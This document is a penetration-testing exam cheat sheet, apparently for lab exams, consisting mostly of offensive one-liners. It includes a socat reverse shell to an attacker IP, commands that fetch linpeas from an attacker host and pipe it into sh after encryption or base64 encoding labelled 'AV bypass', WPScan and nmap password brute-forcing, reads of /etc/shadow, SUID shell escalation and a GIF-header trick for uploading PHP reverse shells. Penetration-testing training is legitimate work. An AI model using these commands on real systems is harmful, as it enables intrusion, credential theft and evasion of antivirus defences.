🍦Exam Tips

find local.txt in privilege escalation command

1. Using `find` Command:

The find command is powerful for locating specific files. Here are examples:

find / -type f -name "local.txt" 2>/dev/null
find / -type f -name "proof.txt" 2>/dev/null

python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
Ctrl + Z
stty raw -echo ; fg ; reset
stty columns 200 rows 200

/: Searches the entire filesystem.
-type f: Restricts the search to files.
-name "local.txt": Looks for files named local.txt.
2>/dev/null: Suppresses error messages from directories you don’t have permission to access.

2. Using `locate` Command (if available):

The locate command is often faster, as it uses a database of files. Run:

locate local.txt

Note: This command might need sudo privileges to update its database (sudo updatedb), and it may not show recent files if the database isn’t up-to-date.

3. Searching Common Sensitive Directories:

If you suspect local.txt is in specific directories (like a user's home or system directories), limit the search:

find /home /root /var -type f -name "local.txt" 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

4. Using `grep` in Filesystem Content (if content is known):

If you’re aware of certain content within local.txt (e.g., flag content in CTF challenges), use:

grep -r "known content" / 2>/dev/null

These methods should help locate local.txt when performing privilege escalation tasks. Let me know if you need further guidance on privilege escalation techniques!

When you get a limited or reverse shell, you often need to stabilize it to improve functionality and usability. This typically involves upgrading it to a fully interactive shell, which enables you to use commands like Ctrl+C, arrow keys, tab completion, and copy-pasting more reliably. Here are some common methods:

1. Upgrade with Python

If the target machine has Python installed, you can use it to upgrade the shell:

python -c 'import pty; pty.spawn("/bin/bash")'

Or if Python 3 is available:

python3 -c 'import pty; pty.spawn("/bin/bash")'

After running this command, your shell will feel more stable. You can further improve it by setting terminal variables:

export TERM=xterm

2. Use `script` Command

The script command starts a new shell session and can sometimes improve stability:

script /dev/null -c bash

3. Upgrade with Socat

If both your machine and the target machine have socat installed, you can create a more stable reverse shell. Set up a listener on your machine:

socat file:`tty`,raw,echo=0 tcp-listen:4444

Then, on the target machine, initiate a connection back to your machine:

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<your-ip>:4444

4. Using `rlwrap` for Command History and Editing

If you're using netcat to catch a shell, you can use rlwrap to wrap it for better line-editing and command history support:

rlwrap nc -lvnp 4444

5. Backgrounding and Using `stty` for Terminal Control

After upgrading with Python or another method, sometimes your shell may still not respond to Ctrl+C or other commands. To fix this:

Background the shell by pressing Ctrl+Z.
Set the terminal options on your own machine:
```
stty raw -echo; fg
```
Then press Enter. This will bring the shell back to the foreground, and it should now handle signals and other inputs correctly.

6. Setting Up SSH Tunneling (if possible)

If SSH access is available, consider setting up a reverse SSH tunnel or using SSH for a fully interactive session:

ssh -R 4444:localhost:4444 user@target

With these techniques, you should be able to stabilize your shell for better interactivity and control. Let me know if you encounter any issues with these steps!

Note :creating new password list using cewl commad any specific use case for the websites use the below command

cewl http://dc-2/ >passwordlist.txt

system enumeration

hostname

uname -a

cat /etc/issue

cat /proc/version

ps aux

lscpu

/bin/bash

Network enumeration

ifconfig

ipconfig

ip route

arp -a

ip neigh

netstat -ano

User Enumeration

/home

/etc/passwd

/etc/shadow

/etc/group

sudo -l

whoami

sudo su -

cat /etc/passwd

cat /etc/shadow

cat local.txt

Password Enumeration

sudo -l

find

ls -la

cat

locate filename

backup script

history

.bash_history

crontab

id_rsa

grep password -

grep --color=auto -rnw '/' -ie 'password' --color=always 2>/dev/null

bash -i

WPScan - Commands

wpscan --url http://funbox.fritz.box/ -e p,t,u -P /usr/share/wordlists/rockyou.txt
wpscan --url http://dc-2/ --disable-tls-checks -U users.txt -P cewl.txt
Wpscan --url http://dc-2/ --disable-tls-checks --enumerate p --enumerate t --enumerate u
wpscan --url http://dc-2/ --disable-tls-checks --enumerate p,t,u
wpscan --url http://dc-2/ -U users.txt -P /usr/share/wordlists/rockyou.txt
wpscan --url http://blogger.pg/assets/fonts/blog/ --enumerate p --plugins-detection aggressive
wpscan --url http://funbox.fritz.box/ -e p,t,u
wpscan --url http://192.168.245.78/wordpress/ -e p,t,u -P /usr/share/wordlists/rockyou.txt
wpscan --url http://192.168.245.78/wordpress/ -U sosimpleusers.txt -P /usr/share/wordlists/rockyou.txt

Privilege Escalation Commands

find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} ; 2>/dev/null
find /bin -name nano -exec /bin/sh ;
find / -perm -u=s -type f 2>/dev/null
python -c 'import pty; pty.spawn("/bin/bash")'

Web Enumeration

gobuster dir -u http://192.168.235.193/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -b 404,401 -x php,asp,js,txt,htm
gobuster dir -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $URL |tee gobuster
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 http://192.168.116.209:80/FUZZ
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 http://192.168.190.209:80/FUZZ
gobuster dir -u http://192.168.124.95/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
gobuster dir -e -u http://10.10.1.28 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,cgi,sh
gobuster dir -u http://10.10.1.24/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt t 4

Determining readable files in home directory:

find /home -readable 2>/dev/null
find / "local.txt" 2>/dev/null | grep "local.txt"

AV bypass

#open-ssl encryption openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc sudo python -m SimpleHTTPServer 80 #Start HTTP server curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim

#Base64 encoded base64 -w0 linpeas.sh > lp.enc sudo python -m SimpleHTTPServer 80 #Start HTTP server curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim

Enumerate users using nmap scripts

nmap -p22 --script ssh-brute.nse 192.168.245.78 --vv

Accepting image,gif revershell in php file some sites, we can use the command in above php-reverse-shell file

GIF89a;

Grabbing id_rsa and login ssh

Rustscan flags

rustscan -a 192.168.1.7 --ulimit 5000

rustscan -a 192.168.1.7

rustscan -a 192.168.1.7 -r 21-50

rustscan -a 192.168.1.7 -- -sC -sV

How to use in few steps:linpeas/linenum

Download LinEnum or Linpeas from github to your victim machine.
Edit the permissions: chmod +x LinEnum.sh or chmod +x linpeas.sh
Run the script: ./LinEnum.sh or linpeas.sh

Download LinEnum/Linpeas from your attacker machine to victim machine:

Download LinEnum/linpeas.sh from github to your own machine.
Host the file on your machine which will run a local server for you on port 8000 by execeuting the following command: python3 -m http.server
Download the file from our server: wget <attacker ip>:8000/LinEnum.sh or wget <attacker ip>:8000/linpeas.sh
Edit the permissions: chmod +x LinEnum.sh / chmod +x linpeas.sh
Run the script: ./LinEnum.sh / ./linpeas.sh